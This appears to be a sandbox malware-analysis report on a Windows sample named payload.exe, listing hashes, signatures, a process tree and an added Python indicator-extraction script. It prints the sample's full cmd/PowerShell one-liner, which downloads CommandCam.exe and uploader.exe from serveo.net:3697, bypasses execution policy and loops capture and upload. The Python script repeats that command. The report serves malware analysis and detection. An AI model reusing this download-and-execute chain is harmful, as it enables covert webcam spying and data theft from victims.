Analysis

max time kernel: 150s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26/03/2024, 04:39
Static task: static1
Behavioral task: behavioral1
Sample: payload.exe
Resource: win10v2004-20240226-en
General

Target: payload.exe
Size: 113KB
MD5: fe8ec3e67ce5fd574c3e4f2317aa81be
SHA1: 8128adf325c80eff2532dcfd2e725f7db13cb720
SHA256: f24090ed6e8c1c8fd39072d623863a60135b2a402bc8630f299639244919d910
SHA512: 84bcb7d555957a17e9995507b3686044b8d41385c1b1879a5bab10093df9ec2ee91acd2cf1ca0c4a5df4dddd638da234493f41158e1f87fe156aa090a900ada3
SSDEEP: 1536:4OhdoS0GQM+dQbSty+Oq1n//+RGDAaxrRNvR4y7P9rvL:4qdotZM+fDn/CGRNfx
Malware Config
Extracted
http://serveo.net:3697/CommandCam.exe
http://serveo.net:3697/uploader.exe
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  23    1740  powershell.exe
  32    1740  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (6 IoCs)
  pid   Process
  3500  CommandCam.exe
  2948  uploader.exe
  748   CommandCam.exe
  1312  uploader.exe
  1472  CommandCam.exe
  1672  uploader.exe

Kills process with taskkill (2 IoCs)
  pid   Process
  2104  taskkill.exe
  3400  taskkill.exe

Suspicious behavior: EnumeratesProcesses (17 IoCs)
  pid   Process         events
  1740  powershell.exe  2
  3700  powershell.exe  15

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1740  powershell.exe
  Token: SeDebugPrivilege  3700  powershell.exe
  Token: SeDebugPrivilege  2104  taskkill.exe
  Token: SeDebugPrivilege  3400  taskkill.exe

Suspicious use of WriteProcessMemory (36 IoCs; 12 distinct parent/child pairs, each reported 3 times)
  description                       pid   Process         procid_target
  PID 3976 wrote to memory of 716   3976  payload.exe     89
  PID 716 wrote to memory of 1648   716   cmd.exe         90
  PID 716 wrote to memory of 1740   716   cmd.exe         91
  PID 716 wrote to memory of 3700   716   cmd.exe         100
  PID 3700 wrote to memory of 3500  3700  powershell.exe  103
  PID 3700 wrote to memory of 2948  3700  powershell.exe  104
  PID 3700 wrote to memory of 2104  3700  powershell.exe  119
  PID 3700 wrote to memory of 748   3700  powershell.exe  120
  PID 3700 wrote to memory of 1312  3700  powershell.exe  121
  PID 3700 wrote to memory of 3400  3700  powershell.exe  131
  PID 3700 wrote to memory of 1472  3700  powershell.exe  132
  PID 3700 wrote to memory of 1672  3700  powershell.exe  133
Processes

Indentation shows parent/child depth. The sample is 32-bit (arch:x86), so the cmd.exe, powershell.exe and taskkill.exe it launches resolve to C:\Windows\SysWOW64 through file-system redirection even though the command lines name C:\Windows\system32.

C:\Users\Admin\AppData\Local\Temp\payload.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\payload.exe"
  PID: 3976
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\ & echo (New-Object System.Net.WebClient).DownloadFile('http://serveo.net:3697/CommandCam.exe', 'CommandCam.exe') > %USERPROFILE%\getcc.ps1 & echo (New-Object System.Net.WebClient).DownloadFile('http://serveo.net:3697/uploader.exe', 'uploader.exe') >> %USERPROFILE%\getcc.ps1 & cd %USERPROFILE%\ & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\getcc.ps1 & echo while ($true) { > %USERPROFILE%\sc.ps1 & echo start -NoNewWindow CommandCam.exe -Wait >> %USERPROFILE%\sc.ps1 & echo start -NoNewWindow uploader.exe >> %USERPROFILE%\sc.ps1 & echo sleep 60 >> %USERPROFILE%\sc.ps1 & echo taskkill /F /IM uploader.exe } >> %USERPROFILE%\sc.ps1 & cd %USERPROFILE%\ & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\sc.ps1 & exit
      PID: 716
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          Command line: cmd.exe /c cd C:\Users\Admin\
          PID: 1648

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -ExecutionPolicy ByPass -File C:\Users\Admin\getcc.ps1
          PID: 1740
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -ExecutionPolicy ByPass -File C:\Users\Admin\sc.ps1
          PID: 3700
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Users\Admin\CommandCam.exe
              Command line: "CommandCam.exe"
              PID: 3500
              - Executes dropped EXE

            C:\Users\Admin\uploader.exe
              Command line: "uploader.exe"
              PID: 2948
              - Executes dropped EXE

            C:\Windows\SysWOW64\taskkill.exe
              Command line: "C:\Windows\system32\taskkill.exe" /F /IM uploader.exe
              PID: 2104
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken

            C:\Users\Admin\CommandCam.exe
              Command line: "CommandCam.exe"
              PID: 748
              - Executes dropped EXE

            C:\Users\Admin\uploader.exe
              Command line: "uploader.exe"
              PID: 1312
              - Executes dropped EXE

            C:\Windows\SysWOW64\taskkill.exe
              Command line: "C:\Windows\system32\taskkill.exe" /F /IM uploader.exe
              PID: 3400
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken

            C:\Users\Admin\CommandCam.exe
              Command line: "CommandCam.exe"
              PID: 1472
              - Executes dropped EXE

            C:\Users\Admin\uploader.exe
              Command line: "uploader.exe"
              PID: 1672
              - Executes dropped EXE
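The cmd.exe one-liner at PID 716 never touches a script file directly: it builds getcc.ps1 and sc.ps1 on disk with a chain of echo redirects and then runs each with powershell -ExecutionPolicy ByPass -File. The script below is an added example, not tria.ge output, that replays those redirects to reconstruct the two dropped scripts and pulls the indicators out of them (download URLs, the host:port, payload file names, scripts executed, execution-policy bypass). The command line is copied from the report; the only assumption is that %USERPROFILE% expands to C:\Users\Admin, which is what the child process paths in the tree show.

```python
import re
from urllib.parse import urlparse

# Command line of PID 716 from the report, minus the leading
# "C:\Windows\system32\cmd.exe /c cmd.exe /c". Copied from the page as-is.
CMDLINE = (
    r"cd %USERPROFILE%\ & "
    r"echo (New-Object System.Net.WebClient).DownloadFile("
    r"'http://serveo.net:3697/CommandCam.exe', 'CommandCam.exe') > %USERPROFILE%\getcc.ps1 & "
    r"echo (New-Object System.Net.WebClient).DownloadFile("
    r"'http://serveo.net:3697/uploader.exe', 'uploader.exe') >> %USERPROFILE%\getcc.ps1 & "
    r"cd %USERPROFILE%\ & "
    r"powershell -ExecutionPolicy ByPass -File %USERPROFILE%\getcc.ps1 & "
    r"echo while ($true) { > %USERPROFILE%\sc.ps1 & "
    r"echo start -NoNewWindow CommandCam.exe -Wait >> %USERPROFILE%\sc.ps1 & "
    r"echo start -NoNewWindow uploader.exe >> %USERPROFILE%\sc.ps1 & "
    r"echo sleep 60 >> %USERPROFILE%\sc.ps1 & "
    r"echo taskkill /F /IM uploader.exe } >> %USERPROFILE%\sc.ps1 & "
    r"cd %USERPROFILE%\ & "
    r"powershell -ExecutionPolicy ByPass -File %USERPROFILE%\sc.ps1 & exit"
)

# Assumed sandbox environment: the report's child processes run from C:\Users\Admin.
ENV = {"USERPROFILE": r"C:\Users\Admin"}

# "echo <text> > file" (truncate) or "echo <text> >> file" (append).
ECHO_REDIRECT = re.compile(r"^echo\s+(.*?)\s*(>>|>)\s*(\S+)$")
# "powershell ... -File <script>"
PS_FILE = re.compile(r"powershell(?:\.exe)?\s+.*?-File\s+(\S+)", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"]+")


def expand_env(path: str, env: dict = ENV) -> str:
    """Expand %VAR% references the way cmd.exe would, using the sandbox's values."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def split_cmd(cmdline: str) -> list:
    """Split a cmd.exe one-liner on its '&' separator.

    Caveat: this sample has no quoted or ^-escaped '&', so a plain split is
    enough; a general parser would have to honour cmd.exe quoting rules.
    """
    return [seg.strip() for seg in cmdline.split("&") if seg.strip()]


def reconstruct_scripts(cmdline: str) -> dict:
    """Replay every echo redirect and return the resulting file contents keyed
    by expanded path. On disk each line would end in a space plus CRLF (cmd's
    echo keeps the space before '>'); that is normalised away here."""
    files = {}
    for seg in split_cmd(cmdline):
        m = ECHO_REDIRECT.match(seg)
        if not m:
            continue
        text, op, target = m.groups()
        path = expand_env(target)
        if op == ">":
            files[path] = [text]          # truncate and write
        else:
            files.setdefault(path, []).append(text)  # append
    return {p: "\n".join(lines) + "\n" for p, lines in files.items()}


def extract_iocs(cmdline: str) -> dict:
    """Indicators from the one-liner and the scripts it drops."""
    scripts = reconstruct_scripts(cmdline)
    urls = sorted({u for body in scripts.values() for u in URL.findall(body)})
    executed, bypass = [], False
    for seg in split_cmd(cmdline):
        m = PS_FILE.search(seg)
        if m:
            executed.append(expand_env(m.group(1)))
            if re.search(r"-ExecutionPolicy\s+bypass", seg, re.IGNORECASE):
                bypass = True
    return {
        "dropped_scripts": scripts,
        "executed_scripts": executed,
        "execution_policy_bypass": bypass,
        "urls": urls,
        "hosts": sorted({urlparse(u).netloc for u in urls}),
        "payload_names": sorted({u.rsplit("/", 1)[-1] for u in urls}),
    }


if __name__ == "__main__":
    iocs = extract_iocs(CMDLINE)
    for path, body in iocs["dropped_scripts"].items():
        print(f"--- {path}\n{body}")
    for key in ("executed_scripts", "execution_policy_bypass", "urls", "hosts", "payload_names"):
        print(f"{key}: {iocs[key]}")
```

The reconstructed sc.ps1 is the loop the process tree shows: CommandCam.exe runs to completion (-Wait), uploader.exe is started, 60 seconds pass, then taskkill /F /IM uploader.exe ends it and the loop repeats, which is why CommandCam.exe, uploader.exe and taskkill.exe appear as repeating children of PID 3700 within the 150-second run.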
Network
MITRE ATT&CK Matrix
Downloads

Filesize: 1KB
MD5: 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1: c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256: e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512: 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Filesize: 16KB
MD5: 2e12ce080ac7587bd8364fdf159136d6
SHA1: b5241dffc38d8cbb26556c3bc8fee3e45bf82770
SHA256: b7d50218585d0d7390733657cf276eb7a1982be7df72a9abcc9d12563c0d9cf8
SHA512: 7533ef60897ef8247db89d5b45d21d3c1bffd65389226b4980c52e56a60f42fbd0377eea894f29d0d751234d1802c775b033e0cab0e029ff603c3afab364274b

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 64KB
MD5: ea678b48940aebe8fbf9a189949fc4a3
SHA1: bc831f699b16345877a0fb5cd49ee9949825e194
SHA256: 5918f85960da8dee6784b2a75eb1e9fa81e1baf6c1727215933653df3f4e2dfb
SHA512: 18e726cf62bc4e987fca0bd5c57dd0f8171a8f376cd37c58a18da6d8e2b33890223735b41ce4c3f6f0247dcfca8b803d506182687863f5d7015b3ff46f9b8415

Filesize: 216B
MD5: 76628a08298a8736289e2346f2856700
SHA1: a8c71d6df89e8ea6c25f51bcd412de88df7e5105
SHA256: 9bafdcd2cbfd8c7607c2be2ef5376764e1870f276142bb7cf4e7c291f210c02e
SHA512: 8d79bdbaa5f0a1013460bc79382a6a243110fc3d7e1271dd5232ceec9ca8321933c7f2de65cb3de87d295ed4176c3437b7bae92b96bbc1aa09b7fbe4f06925bd

Filesize: 143B
MD5: 2a36e50db28701fa952161ad34039c4c
SHA1: e3e8259615eeb2432cd81396679fa137481c3150
SHA256: 5704ba2006acaeb07f0817a67f03c128feb90237fec1638b5b92ed178647d104
SHA512: 6a41b172f88f669bb6a2f476187492e200a41dc8b7bdaacfaab8db0d1c3dd65c3a387ad3151dd79fe3c481601763dd4a1164ba93541160a288edc0688c8e6fda

Filesize: 1009KB
MD5: 13f7e957f5ac639b5852bd1ca821c11e
SHA1: aa9fdff1d2a8bf207f446c81f39a40c70edd9ab1
SHA256: cc8e24475ba9179e141def6493611274046fff3d0de544672159c25a3351c350
SHA512: 38dacec8bc5185d01190454f65f90e45c53b5deaa7692f0b9879163a599e86ef4b579c626fee2e029c9311be9852b98526a89af3e6d0073785f84bd1714d9361